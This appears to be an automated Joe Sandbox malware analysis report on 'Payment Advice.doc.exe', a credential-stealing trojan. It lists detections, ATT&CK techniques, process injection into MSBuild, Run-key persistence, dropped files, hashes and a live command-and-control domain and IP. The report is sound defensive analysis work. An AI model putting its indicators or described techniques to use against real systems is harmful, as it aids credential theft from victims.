              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000000.463163669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000000.450308266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3280, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1
              Registry Run Keys / Startup Folder              		211
              Process Injection              		11
              Masquerading              		1
              OS Credential Dumping              		1
              Query Registry              		Remote Services21
              Input Capture              		Exfiltration Over Other Network Medium12
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Registry Run Keys / Startup Folder              		1
              Disable or Modify Tools              		21
              Input Capture              		11
              Security Software Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		Exfiltration Over Bluetooth1
              Non-Application Layer Protocol              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
              Virtualization/Sandbox Evasion              		1
              Credentials In Files              		1
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration12
              Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)211
              Process Injection              		NTDS21
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common12
              Obfuscated Files or Information              		Cached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items11
              Software Packing              		DCSync11
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Timestomp              		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 624065 Sample: Payment Advice.doc.exe Startdate: 11/05/2022 Architecture: WINDOWS Score: 100 48 chongmei33.myddns.rocks 2->48 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 9 other signatures 2->60 8 Payment Advice.doc.exe 1 4 2->8         started        12 word.exe 1 2->12         started        14 word.exe 1 2->14         started        signatures3 process4 file5 42 C:\Users\user\AppData\Local\word.exe, PE32 8->42 dropped 44 C:\Users\user\...\word.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\...\Payment Advice.doc.exe.log, ASCII 8->46 dropped 62 Writes to foreign memory regions 8->62 64 Injects a PE file into a foreign processes 8->64 16 MSBuild.exe 8->16         started        19 MSBuild.exe 2 8->19         started        22 cmd.exe 1 8->22         started        24 MSBuild.exe 8->24         started        66 Antivirus detection for dropped file 12->66 68 Multi AV Scanner detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 26 cmd.exe 1 12->26         started        28 cmd.exe 1 14->28         started        signatures6 process7 dnsIp8 52 Contains functionality to steal Chrome passwords or cookies 16->52 50 chongmei33.myddns.rocks 172.111.216.19, 49703 M247GB United States 19->50 30 conhost.exe 22->30         started        32 timeout.exe 1 22->32         started        34 conhost.exe 26->34         started        36 timeout.exe 1 26->36         started        38 conhost.exe 28->38         started        40 timeout.exe 1 28->40         started        signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Payment Advice.doc.exe41%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              Payment Advice.doc.exe100%AviraHEUR/AGEN.1232117
              Payment Advice.doc.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\word.exe100%AviraHEUR/AGEN.1232117
              C:\Users\user\AppData\Local\word.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\word.exe41%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              28.0.MSBuild.exe.400000.3.unpack100%AviraTR/Spy.GenDownload File
              20.0.word.exe.390000.0.unpack100%AviraHEUR/AGEN.1232117Download File
              19.0.word.exe.310000.0.unpack100%AviraHEUR/AGEN.1232117Download File
              28.0.MSBuild.exe.400000.7.unpack100%AviraTR/Spy.GenDownload File
              28.0.MSBuild.exe.400000.4.unpack100%AviraTR/Spy.GenDownload File
              28.0.MSBuild.exe.400000.6.unpack100%AviraTR/Spy.GenDownload File
              28.0.MSBuild.exe.400000.5.unpack100%AviraTR/Spy.GenDownload File
              28.0.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.GenDownload File
              28.2.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.GenDownload File
              20.2.word.exe.390000.0.unpack100%AviraHEUR/AGEN.1232117Download File
              28.0.MSBuild.exe.400000.1.unpack100%AviraTR/Spy.GenDownload File
              28.0.MSBuild.exe.400000.2.unpack100%AviraTR/Spy.GenDownload File
              0.0.Payment Advice.doc.exe.f30000.0.unpack100%AviraHEUR/AGEN.1232117Download File
              19.2.word.exe.310000.0.unpack100%AviraHEUR/AGEN.1232117Download File

              Domains

              SourceDetectionScannerLabelLink
              chongmei33.myddns.rocks8%VirustotalBrowse
              windowsupdatebg.s.llnwi.net0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              chongmei33.myddns.rocks:49703100%Avira URL Cloudmalware
              http://www.yandex.comsocks=0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              chongmei33.myddns.rocks
              		172.111.216.19
              		truetrueunknown
              windowsupdatebg.s.llnwi.net
              		95.140.230.192
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              chongmei33.myddns.rocks:49703true
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.yandex.comMSBuild.exefalse
                		high
                https://stackoverflow.com/q/14436606/23354word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.yandex.comsocks=MSBuild.exe, 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  https://stackoverflow.com/q/2152978/23354rCannotword.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://stackoverflow.com/q/11564914/23354;word.exe, 00000013.00000002.523008379.000000000293F000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000014.00000002.522774613.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      172.111.216.19
                      		chongmei33.myddns.rocksUnited States
                      		9009M247GBtrue

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:624065
                      Start date and time: 11/05/202203:05:092022-05-11 03:05:09 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 10m 34s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:Payment Advice.doc.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:38
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@24/3@3/1
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 7% (good quality ratio 4.2%)
                      • Quality average: 48.1%
                      • Quality standard deviation: 43.9%
                      HCA Information:
                      • Successful, ratio: 82%
                      • Number of executed functions: 266
                      • Number of non-executed functions: 31
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Adjust boot time
                      • Enable AMSI

                      Warnings

                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                      • Excluded IPs from analysis (whitelisted): 20.82.210.154, 23.211.6.115, 20.190.159.68, 20.190.159.2, 20.190.159.23, 40.126.31.67, 20.190.159.75, 20.190.159.0, 40.126.31.71, 20.190.159.4, 40.126.32.69, 40.126.32.67, 20.190.160.12, 20.190.160.23, 40.126.32.137, 20.190.160.21, 40.126.32.135, 40.126.32.73, 20.199.120.151, 23.211.4.86, 95.140.230.192, 20.199.120.85, 80.67.82.235, 80.67.82.211, 51.11.168.232, 23.205.181.161, 40.127.240.158, 20.54.89.106, 52.152.110.14, 52.242.101.226, 20.223.24.244
                      • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, settings-prod-neu-1.northeurope.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, settings-prod-uks-1.uksouth.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, atm-settingsfe-prod-geo.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontd
                      • Execution Graph export aborted for target MSBuild.exe, PID 3280 because it is empty
                      • Execution Graph export aborted for target Payment Advice.doc.exe, PID 6264 because there are no executed function
                      • Execution Graph export aborted for target word.exe, PID 4816 because it is empty
                      • Execution Graph export aborted for target word.exe, PID 6104 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      03:07:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run word "C:\Users\user\AppData\Local\word.exe"
                      03:07:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run word "C:\Users\user\AppData\Local\word.exe"

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      windowsupdatebg.s.llnwi.net4LiYZgg0OK.exeGet hashmaliciousBrowse
                      • 95.140.230.128
                      REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                      • 178.79.225.0
                      Product_items.xlsxGet hashmaliciousBrowse
                      • 95.140.230.192
                      NIAFkapJ9YwEp3z.exeGet hashmaliciousBrowse
                      • 95.140.230.128
                      Image00005.exeGet hashmaliciousBrowse
                      • 95.140.230.128
                      ORDER CONFIRMATION COPY.xlsxGet hashmaliciousBrowse
                      • 178.79.225.0
                      1.exeGet hashmaliciousBrowse
                      • 95.140.230.128
                      CASTEC VINA TRADING CO - NEW PO#2022CTV06.pif.exeGet hashmaliciousBrowse
                      • 178.79.225.128
                      Cancellation-507660980$-May5.xlsbGet hashmaliciousBrowse
                      • 178.79.225.0
                      SignedCopy10302011122005945.jpg.exeGet hashmaliciousBrowse
                      • 95.140.230.128
                      PurchasedOrderMay06-PDF.exeGet hashmaliciousBrowse
                      • 95.140.230.128
                      Quotation Q 2022-05-05.exeGet hashmaliciousBrowse
                      • 178.79.225.128
                      119550,pdf.exeGet hashmaliciousBrowse
                      • 95.140.230.128
                      https://microsoftweb889.wixsite.com/web-noteGet hashmaliciousBrowse
                      • 178.79.225.0
                      https://www.lanemedllc.com/Get hashmaliciousBrowse
                      • 178.79.225.128
                      Recibo de la transacci#U00f3n.PDF.exeGet hashmaliciousBrowse
                      • 178.79.225.128
                      Copy of Shipment Documents.xlsxGet hashmaliciousBrowse
                      • 95.140.230.128
                      Pnkfvrn.exeGet hashmaliciousBrowse
                      • 95.140.230.192
                      https://thehousechloe.com/.cgz/ma!l097dt-yr478bnvjweb33-@k/acc33ss/index.html#test@abc.comGet hashmaliciousBrowse
                      • 178.79.225.128
                      zsVbxziMQ7.exeGet hashmaliciousBrowse
                      • 95.140.230.192
                      chongmei33.myddns.rocksORDER #0554.exeGet hashmaliciousBrowse
                      • 37.120.208.37
                      Quotation #01521.exeGet hashmaliciousBrowse
                      • 37.120.208.40

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      M247GBfU0e51cFa3Get hashmaliciousBrowse
                      • 89.47.62.32
                      Payment Advice.jsGet hashmaliciousBrowse
                      • 46.243.140.81
                      P8Ql4X3E2TGet hashmaliciousBrowse
                      • 45.11.2.204
                      mount.dllGet hashmaliciousBrowse
                      • 185.156.172.62
                      mount.dllGet hashmaliciousBrowse
                      • 185.156.172.62
                      mount.dllGet hashmaliciousBrowse
                      • 185.156.172.62
                      seTP2VCP4fGet hashmaliciousBrowse
                      • 38.202.225.77
                      gsBmFpaYs0Get hashmaliciousBrowse
                      • 206.127.222.218
                      vC2rgBSU2pGet hashmaliciousBrowse
                      • 206.127.222.215
                      k9nvsaxuSXGet hashmaliciousBrowse
                      • 38.202.83.219
                      mount.dllGet hashmaliciousBrowse
                      • 185.156.172.62
                      RCVVJ1sq5QGet hashmaliciousBrowse
                      • 45.11.2.208
                      b6YSeNoCTZGet hashmaliciousBrowse
                      • 196.16.207.245
                      beamer.x86-20220504-2050Get hashmaliciousBrowse
                      • 193.142.58.171
                      beamer.arm7-20220504-2050Get hashmaliciousBrowse
                      • 193.142.58.171
                      beamer.arm-20220504-2050Get hashmaliciousBrowse
                      • 193.142.58.171
                      qN2AhGteDJGet hashmaliciousBrowse
                      • 38.202.251.238
                      ScanCopy-09876AWB#732606323042022.exeGet hashmaliciousBrowse
                      • 5.181.234.149
                      SpNP9db6KA.exeGet hashmaliciousBrowse
                      • 193.142.58.38
                      KEie4St7TtGet hashmaliciousBrowse
                      • 193.189.74.114

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Advice.doc.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\Payment Advice.doc.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):805
                      Entropy (8bit):5.360596073797118
                      Encrypted:false
                      SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhRAE4Kzr7GE4Kx1qE4j:MxHKXwYHKhQnoRAHKzvGHKx1qHj
                      MD5:0647161723678221993F7C643DC061CA
                      SHA1:89827E9F23374A366A37A65D342426E3FE55B51D
                      SHA-256:6DFEA2C2005700B36688D32D2F85A3B19C552DDC696170C54507DF3C59B5167B
                      SHA-512:FC451863A5E89F3F19FAD563A3F8EA75476085B6D9CE9EA8F66C62C152DC01B751EC2C816CE3838A803F54EDC7765A8C01200C1BAF9690BEC7900795ABC43C8B
                      Malicious:true
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                      C:\Users\user\AppData\Local\word.exe

                      Download File
                      Process:C:\Users\user\Desktop\Payment Advice.doc.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):1526784
                      Entropy (8bit):6.513459849991728
                      Encrypted:false
                      SSDEEP:24576:/1IW4YMbH4013sd8WLp9Nq2YZYDJiftDX46es6:/1iJLnMrVXwVDTr6
                      MD5:173ECAE1209E548D0DF71D631494B30D
                      SHA1:34FBCE321E992E5BF88BD1A3C0502DC5679E71A7
                      SHA-256:8A54DB382066229C50CC8E6FEAB1BC532431EE7804E54EFCEEFFD696422E64D4
                      SHA-512:7501FED45E269EE2E4FC9AD9E824659EBBC5C864698EDC49511674EE394D3E5070A6C8B24B1BBEB42386AAE62DB1C55D9D251D985EF56A2C5306B82AC530754A
                      Malicious:true
                      Yara Hits:
                      • Rule: Typical_Malware_String_Transforms, Description: Detects typical strings in a reversed or otherwise modified form, Source: C:\Users\user\AppData\Local\word.exe, Author: Florian Roth
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 41%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M................0..\...........z... ........@.. ....................................@..................................y..K.................................................................................... ............... ..H............text...$Z... ...\.................. ..`.rsrc................^..............@..@.reloc...............J..............@..B.................z......H.......<4...$...........X... ..........................................:.(.....(.....*.6.(....8.....*..&~.......*...~....*..0..........8......*8....8.....(......8.......(......8.......0..x.......8C.....o....(...+..8........%.Y.......8-...8%...8 ............o....8.....s......8......*..:....8......i..8....8....8.....0..........8........E....E...8@.....*..s....(......8....8....8.......8$.....(....o....s......8......:....8....8....8........(....8....... ....o......8..........9.

                      C:\Users\user\AppData\Local\word.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\Payment Advice.doc.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):6.513459849991728
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      • Win32 Executable (generic) a (10002005/4) 49.78%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      File name:Payment Advice.doc.exe
                      File size:1526784
                      MD5:173ecae1209e548d0df71d631494b30d
                      SHA1:34fbce321e992e5bf88bd1a3c0502dc5679e71a7
                      SHA256:8a54db382066229c50cc8e6feab1bc532431ee7804e54efceeffd696422e64d4
                      SHA512:7501fed45e269ee2e4fc9ad9e824659ebbc5c864698edc49511674ee394d3e5070a6c8b24b1bbeb42386aae62db1c55d9d251d985ef56a2c5306b82ac530754a
                      SSDEEP:24576:/1IW4YMbH4013sd8WLp9Nq2YZYDJiftDX46es6:/1iJLnMrVXwVDTr6
                      TLSH:5865296D77198905DC80C775EDB33B6327E2C7B578E5730AA3F63A29D26B3AC1502602
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M................0..\...........z... ........@.. ....................................@................................

                      File Icon

                      Icon Hash:87064866664cb0ee

                      Static PE Info

                      General

                      Entrypoint:0x567a1e
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x858D4DE3 [Tue Jan 1 05:17:23 2041 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:v4.0.30319
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1679d00x4b.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1680000xeab4.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1780000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x165a240x165c00False0.541818166929data6.49152304307IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rsrc0x1680000xeab40xec00False0.293183924788data4.62815454941IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
